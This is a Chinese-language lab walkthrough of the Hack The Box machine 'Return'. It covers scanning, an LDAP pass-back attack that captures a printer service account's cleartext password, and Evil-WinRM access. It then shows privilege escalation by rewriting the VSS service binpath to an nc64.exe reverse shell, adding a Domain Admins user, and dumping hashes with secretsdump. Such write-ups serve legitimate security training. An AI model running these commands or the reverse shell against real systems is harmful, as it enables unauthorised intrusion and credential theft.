从零开始的windows生活-Return

少年だった僕たちは
曾经都是少年的我们
いつか青年に変わっていく
终有一天会变为青年。
年老いていつか枯れ葉のように
年老之后会如枯叶一般
誰にも知られず朽ちていく
在不为人知的情况下腐朽。

靶机ip：10.129.217.15

难度：低

涉及内容：

信息收集：端口探测 (RustScan/Nmap) 与 Web 目录爆破 (Feroxbuster) 。

凭据获取：利用打印机后台 settings.php 漏洞进行 LDAP Pass-back 攻击，捕获明文账号密码。

初始访问：使用 Evil-WinRM 登录 svc-printer 账户。

权限提升：滥用 Server Operators 组权限，通过修改系统服务 (sc config) 提权至 SYSTEM 。

1. 边界侦察与服务指纹识别 (Reconnaissance)

rustscan全端口扫描：

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 10.129.217.15 -r 1-65535 --ulimit 5000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.217.15:53
Open 10.129.217.15:80
Open 10.129.217.15:88
Open 10.129.217.15:135
Open 10.129.217.15:139
Open 10.129.217.15:389
Open 10.129.217.15:445
Open 10.129.217.15:464
Open 10.129.217.15:593
Open 10.129.217.15:636
Open 10.129.217.15:3268
Open 10.129.217.15:3269
Open 10.129.217.15:47001
Open 10.129.217.15:49666
Open 10.129.217.15:49668
Open 10.129.217.15:49664
Open 10.129.217.15:49665
Open 10.129.217.15:49676
Open 10.129.217.15:49679
Open 10.129.217.15:49671
Open 10.129.217.15:49675
Open 10.129.217.15:49674
Open 10.129.217.15:49694
Open 10.129.217.15:63229
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-14 21:13 EST
Initiating Ping Scan at 21:13
Scanning 10.129.217.15 [4 ports]
Completed Ping Scan at 21:13, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:13
Completed Parallel DNS resolution of 1 host. at 21:13, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:13
Scanning 10.129.217.15 [24 ports]
Discovered open port 80/tcp on 10.129.217.15
Discovered open port 445/tcp on 10.129.217.15
Discovered open port 139/tcp on 10.129.217.15
Discovered open port 53/tcp on 10.129.217.15
Discovered open port 636/tcp on 10.129.217.15
Discovered open port 135/tcp on 10.129.217.15
Discovered open port 49664/tcp on 10.129.217.15
Discovered open port 464/tcp on 10.129.217.15
Discovered open port 3269/tcp on 10.129.217.15
Discovered open port 49666/tcp on 10.129.217.15
Discovered open port 47001/tcp on 10.129.217.15
Discovered open port 49676/tcp on 10.129.217.15
Discovered open port 389/tcp on 10.129.217.15
Discovered open port 63229/tcp on 10.129.217.15
Discovered open port 49668/tcp on 10.129.217.15
Discovered open port 49694/tcp on 10.129.217.15
Discovered open port 49675/tcp on 10.129.217.15
Discovered open port 88/tcp on 10.129.217.15
Discovered open port 593/tcp on 10.129.217.15
Discovered open port 49674/tcp on 10.129.217.15
Discovered open port 49665/tcp on 10.129.217.15
Discovered open port 49679/tcp on 10.129.217.15
Discovered open port 49671/tcp on 10.129.217.15
Discovered open port 3268/tcp on 10.129.217.15
Completed SYN Stealth Scan at 21:13, 0.19s elapsed (24 total ports)
Nmap scan report for 10.129.217.15
Host is up, received echo-reply ttl 127 (0.091s latency).
Scanned at 2026-01-14 21:13:52 EST for 0s

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
47001/tcp open  winrm            syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49665/tcp open  unknown          syn-ack ttl 127
49666/tcp open  unknown          syn-ack ttl 127
49668/tcp open  unknown          syn-ack ttl 127
49671/tcp open  unknown          syn-ack ttl 127
49674/tcp open  unknown          syn-ack ttl 127
49675/tcp open  unknown          syn-ack ttl 127
49676/tcp open  unknown          syn-ack ttl 127
49679/tcp open  unknown          syn-ack ttl 127
49694/tcp open  unknown          syn-ack ttl 127
63229/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
           Raw packets sent: 28 (1.208KB) | Rcvd: 25 (1.084KB)

rustscan——nmap细节探测

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 10.129.217.15 -r 1-65535 --ulimit 5000 -- -A -sV -sC
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.217.15:80
Open 10.129.217.15:88
Open 10.129.217.15:135
Open 10.129.217.15:139
Open 10.129.217.15:389
Open 10.129.217.15:593
Open 10.129.217.15:636
Open 10.129.217.15:3268
Open 10.129.217.15:3269
Open 10.129.217.15:5985
Open 10.129.217.15:9389
Open 10.129.217.15:53
Open 10.129.217.15:464
Open 10.129.217.15:445
Open 10.129.217.15:47001
Open 10.129.217.15:63229
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A -sV -sC" on ip 10.129.217.15
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-14 21:15 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:15
Completed NSE at 21:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:15
Completed NSE at 21:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:15
Completed NSE at 21:15, 0.00s elapsed
Initiating Ping Scan at 21:15
Scanning 10.129.217.15 [4 ports]
Completed Ping Scan at 21:15, 1.65s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:15
Completed Parallel DNS resolution of 1 host. at 21:15, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:15
Scanning 10.129.217.15 [16 ports]
Discovered open port 53/tcp on 10.129.217.15
Discovered open port 80/tcp on 10.129.217.15
Discovered open port 135/tcp on 10.129.217.15
Discovered open port 139/tcp on 10.129.217.15
Discovered open port 63229/tcp on 10.129.217.15
Discovered open port 445/tcp on 10.129.217.15
Discovered open port 464/tcp on 10.129.217.15
Discovered open port 5985/tcp on 10.129.217.15
Discovered open port 9389/tcp on 10.129.217.15
Discovered open port 389/tcp on 10.129.217.15
Discovered open port 88/tcp on 10.129.217.15
Discovered open port 3268/tcp on 10.129.217.15
Discovered open port 47001/tcp on 10.129.217.15
Discovered open port 636/tcp on 10.129.217.15
Discovered open port 593/tcp on 10.129.217.15
Discovered open port 3269/tcp on 10.129.217.15
Completed SYN Stealth Scan at 21:15, 0.21s elapsed (16 total ports)
Initiating Service scan at 21:15
Scanning 16 services on 10.129.217.15
Stats: 0:00:46 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 93.75% done; ETC: 21:16 (0:00:03 remaining)
Completed Service scan at 21:16, 57.06s elapsed (16 services on 1 host)
Initiating OS detection (try #1) against 10.129.217.15
Retrying OS detection (try #2) against 10.129.217.15
Initiating Traceroute at 21:16
Completed Traceroute at 21:16, 0.09s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:16
Completed Parallel DNS resolution of 2 hosts. at 21:16, 0.00s elapsed
DNS resolution of 2 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 2, DR: 0, SF: 0, TR: 2, CN: 0]
NSE: Script scanning 10.129.217.15.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:16
Completed NSE at 21:16, 9.36s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:16
Completed NSE at 21:16, 2.46s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:16
Completed NSE at 21:16, 0.00s elapsed
Nmap scan report for 10.129.217.15
Host is up, received reset ttl 127 (0.088s latency).
Scanned at 2026-01-14 21:15:24 EST for 72s

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-01-15 02:34:06Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
63229/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2016 (96%), Microsoft Windows Server 2019 (96%), Microsoft Windows 10 (93%), Microsoft Windows 10 1709 - 21H2 (93%), Microsoft Windows 10 1903 (93%), Microsoft Windows 10 21H1 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2022 (93%), Windows Server 2019 (92%), Microsoft Windows Vista SP1 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=1/14%OT=53%CT=%CU=42462%PV=Y%DS=2%DC=T%G=N%TM=69684E04%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=S%TS=U)
SEQ(SP=104%GCD=2%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=U)
OPS(O1=M542NW8NNS%O2=M542NW8NNS%O3=M542NW8%O4=M542NW8NNS%O5=M542NW8NNS%O6=M542NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%T=80%W=FFFF%O=M542NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 43714/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 24974/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 54529/udp): CLEAN (Failed to receive data)
|   Check 4 (port 51924/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 18m33s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-01-15T02:35:03
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   83.25 ms 10.10.14.1
2   83.56 ms 10.129.217.15

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:16
Completed NSE at 21:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:16
Completed NSE at 21:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:16
Completed NSE at 21:16, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.35 seconds
           Raw packets sent: 62 (4.092KB) | Rcvd: 61 (3.808KB)

端口组合特征：同时开放了 53 (DNS)、88 (Kerberos)、389 (LDAP) 和 445 (SMB)。这是典型的 Windows 域控制器 (Domain Controller) 特征。这意味着我们面对的不仅仅是一台普通的服务器，而是域环境的核心。

远程管理入口：

5985 (WinRM)：开放了 Windows Remote Management 服务。这是一个非常关键的发现，因为相比于 SMB (445) 需要通过 PsExec 等容易被杀软拦截的方式执行命令，WinRM 是 Windows 原生的管理协议，如果我们能拿到凭据，通过 Evil-WinRM 登录通常更稳定且隐蔽性更好。

593 (HTTP-RPC-EPMAP)：这也是域环境中常见的 RPC over HTTP 端口，常用于 DCOM 通信。

将扫描所得域名填入hosts

1
2
3

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# echo "10.129.217.15 return.local printer.return.local" | tee -a /etc/hosts
10.129.217.15 return.local printer.return.local

2. 服务枚举与 Web 探测 (Service Enumeration)

smb服务探测

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.217.15  
SMB         10.129.217.15   445    PRINTER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False) 

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -L //10.129.217.15                        
Password for [WORKGROUP\root]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.217.15 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

不允许匿名登录

enum4linux全面探测

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# enum4linux -A 10.129.217.15                                               
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jan 14 21:20:57 2026

 =========================================( Target Information )=========================================
                                                                                                                                                           
Target ........... 10.129.217.15                                                                                                                           
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 10.129.217.15 )===========================
                                                                                                                                                           
                                                                                                                                                           
[E] Can't find workgroup/domain                                                                                                                            
                                                                                                                                                           
                                                                                                                                                           

 ===================================( Session Check on 10.129.217.15 )===================================
                                                                                                                                                           
                                                                                                                                                           
[+] Server 10.129.217.15 allows sessions using username '', password ''                                                                                    
                                                                                                                                                           
                                                                                                                                                           
 ================================( Getting domain SID for 10.129.217.15 )================================
                                                                                                                                                           
Domain Name: RETURN                                                                                                                                        
Domain Sid: S-1-5-21-3750359090-2939318659-876128439

[+] Host is part of a domain (not a workgroup)                                                                                                             
                                                                                                                                                           
enum4linux complete on Wed Jan 14 21:21:09 2026

没有找到什么有价值的信息，试一试用guest账户爆破用户名。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb return.local -u guest -p '' --rid-brute
SMB         10.129.217.15   445    PRINTER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)                                                                                                                                                    
SMB         10.129.217.15   445    PRINTER          [-] return.local\guest: STATUS_ACCOUNT_DISABLED

guest账户被禁用，看来只能去80端口看一看有没有有价值的信息了。

目录扫描爆破

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# feroxbuster -u http://10.129.217.15 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,zip,txt,html,htm --scan-dir-listings  -C 503,404 
                                                                                                                                                           
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.129.217.15/
 🚩  In-Scope Url          │ 10.129.217.15
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
 💢  Status Code Filters   │ [503, 404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 📂  Scan Dir Listings     │ true
 💲  Extensions            │ [php, zip, txt, html, htm]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        2l       10w      151c http://10.129.217.15/images => http://10.129.217.15/images/
200      GET     1376l     2855w    29090c http://10.129.217.15/settings.php
200      GET       39l      196w    17216c http://10.129.217.15/images/1.png
200      GET     1345l     2796w    28274c http://10.129.217.15/index.php
200      GET     1345l     2796w    28274c http://10.129.217.15/
301      GET        2l       10w      151c http://10.129.217.15/Images => http://10.129.217.15/Images/
200      GET     1345l     2796w    28274c http://10.129.217.15/Index.php
301      GET        2l       10w      151c http://10.129.217.15/IMAGES => http://10.129.217.15/IMAGES/
200      GET     1345l     2796w    28274c http://10.129.217.15/INDEX.php

3.漏洞利用与凭据窃取 (Exploitation & Credential Access)

重点看setting.php。

看到可以更新，抓一个包看看是怎么回事

POST /settings.php HTTP/1.1
Host: 10.129.217.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Origin: http://10.129.217.15
Connection: keep-alive
Referer: http://10.129.217.15/settings.php
Upgrade-Insecure-Requests: 1
Priority: u=0, i

ip=printer.return.local

可以看到只发出了ip这个参数，其他的用户名密码什么的都是摆设。

那么如果把ip设为攻击机的ip，nc监听389端口，会收到什么呢？

这一步攻击的学名叫做 LDAP Pass-back 或 Rogue LDAP Server（恶意 LDAP 服务器）攻击。

漏洞成因：该打印机管理面板在点击“Update”时，后端 PHP 代码逻辑是为了验证“服务器地址”是否有效，尝试使用用户提供的 IP 地址和当前保存的凭据（User/Pass）去发起一个 LDAP Bind（绑定认证） 请求。

为什么是明文？ 通常 LDAP 认证分为 Simple Bind（明文或简单加密）和 SASL（如 NTLM/Kerberos）。

当我们用 nc -lvnp 389 监听时，我们实际上是伪装成了一个 LDAP 服务器。

受害机（打印机面板）向我们的 IP 发起 TCP 连接。

我们在 nc 中收到的 0* 开头的乱码字符中夹杂着明文密码 1edFg43012!!，这证明目标发起的是 LDAP Simple Bind。如果是 NTLM 认证，我们看到的将是一串 Hash 挑战值，那样就必须使用 Responder 等工具来捕获并破解，而无法直接用 nc 读取。

结论：这是一个配置错误，应用在内网中使用了不安全的明文 LDAP 认证方式，导致我们通过欺骗目标连接恶意服务器，直接截获了凭据。

┌──(root㉿kaada)-[/opt/BurpSuitePro]
└─# nc -lvnp 389
listening on [any] 389 ...
connect to [10.10.14.70] from (UNKNOWN) [10.129.217.15] 61769
0*`%return\svc-printer�
                       1edFg43012!!

我们成功的收到了一组登录凭据！

4.建立初始立足点 (Initial Access)

现在以此用户的身份探查信息。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.217.15 -u 'svc-printer' -p '1edFg43012!!' --shares
SMB         10.129.217.15   445    PRINTER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)                                                                                                                                                    
SMB         10.129.217.15   445    PRINTER          [+] return.local\svc-printer:1edFg43012!! 
SMB         10.129.217.15   445    PRINTER          [*] Enumerated shares
SMB         10.129.217.15   445    PRINTER          Share           Permissions     Remark
SMB         10.129.217.15   445    PRINTER          -----           -----------     ------
SMB         10.129.217.15   445    PRINTER          ADMIN$          READ            Remote Admin
SMB         10.129.217.15   445    PRINTER          C$              READ,WRITE      Default share
SMB         10.129.217.15   445    PRINTER          IPC$            READ            Remote IPC
SMB         10.129.217.15   445    PRINTER          NETLOGON        READ            Logon server share 
SMB         10.129.217.15   445    PRINTER          SYSVOL          READ            Logon server share

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm 10.129.217.15 -u 'svc-printer' -p '1edFg43012!!'       
WINRM       10.129.217.15   5985   PRINTER          [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local) 
WINRM       10.129.217.15   5985   PRINTER          [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)

发现我们有远程登录权限，那么立刻用evil-winrm登录拿到shell

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i 10.129.217.15 -u 'svc-printer' -p '1edFg43012!!'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents>

5.内部枚举与提权路径分析 (Post-Exploitation)

登录成功后用whoami探查当前身份权限。

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /all

USER INFORMATION
----------------

User Name          SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

其中有一个组值得我们注意

1	`BUILTIN\Server Operators`

这个组允许我们启动/停止/创建服务，那么我们可以创建一个服务提权到system。

6.权限提升：滥用 Server Operators 组 (Privilege Escalation)

服务滥用 (Service Abuse) 原理：

目标：Windows 服务默认以 NT AUTHORITY\SYSTEM (System) 这一最高权限身份运行。如果我们能控制一个服务“执行什么代码”，我们就等于控制了 System 权限。

SCM (Service Control Manager)：Windows 的服务由 SCM 管理。普通用户无法修改服务配置。

ACL (访问控制列表)：Server Operators 组对特定的服务（或所有服务，取决于具体配置）拥有 SERVICE_CHANGE_CONFIG 和 SERVICE_START 权限。

攻击链：

目标选择：我们选择了 VSS (Volume Shadow Copy) 服务。这是一个系统服务，默认通常是停止状态，修改它对系统稳定性影响较小（实战中应尽量选择第三方服务，避免破坏系统组件）。

Payload 注入：sc.exe config 命令修改了注册表中该服务的 ImagePath (即 binpath)。我们将原本合法的 VSS 路径替换为了我们的反弹 Shell 命令：cmd.exe /c ... nc64.exe ...。

权限飞跃：当我们执行 sc start 时，SCM 以为自己在启动合法的 VSS 服务，但实际上它以 System 身份执行了我们的恶意命令。

先上传一个nc64.exe

*Evil-WinRM* PS C:\> mkdir Temp


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/14/2026   8:22 PM                Temp


*Evil-WinRM* PS C:\> cd Temp
*Evil-WinRM* PS C:\Temp> upload nc64.exe
                                        
Info: Uploading /home/kali/Desktop/nc64.exe to C:\Temp\nc64.exe
                                        
Data: 60360 bytes of 60360 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Temp>

使用该命令修改服务，连接到我们的攻击机。

1 2	`Evil-WinRM PS C:\Temp> sc.exe config VSS binpath= "C:\windows\system32\cmd.exe /c C:\Temp\nc64.exe -e cmd 10.10.14.70 4444" [SC] ChangeServiceConfig SUCCESS`

服务修改成功，接下来启动该服务

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc -lvvp 4444
listening on [any] 4444 ...
connect to [10.10.14.70] from return.local [10.129.217.15] 53605
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

那么之后创建一个临时用户抓取域中所有的哈希

C:\Users\Administrator\Desktop>net user hacker P@ssw0rd123!
C:\Users\Administrator\Desktop>net group "Domain Admins" hacker /add /domain
net group "Domain Admins" hacker /add /domain
The command completed successfully.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-secretsdump return.local/hacker:'P@ssw0rd123!'@10.129.217.15
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
RETURN\PRINTER$:aes256-cts-hmac-sha1-96:f1742d1b78c89a9d083c26369dc2c4259239801f940a8cacc9055bac5cdfba4d
RETURN\PRINTER$:aes128-cts-hmac-sha1-96:46efbc5c55b316fe2d33d207fbecc859
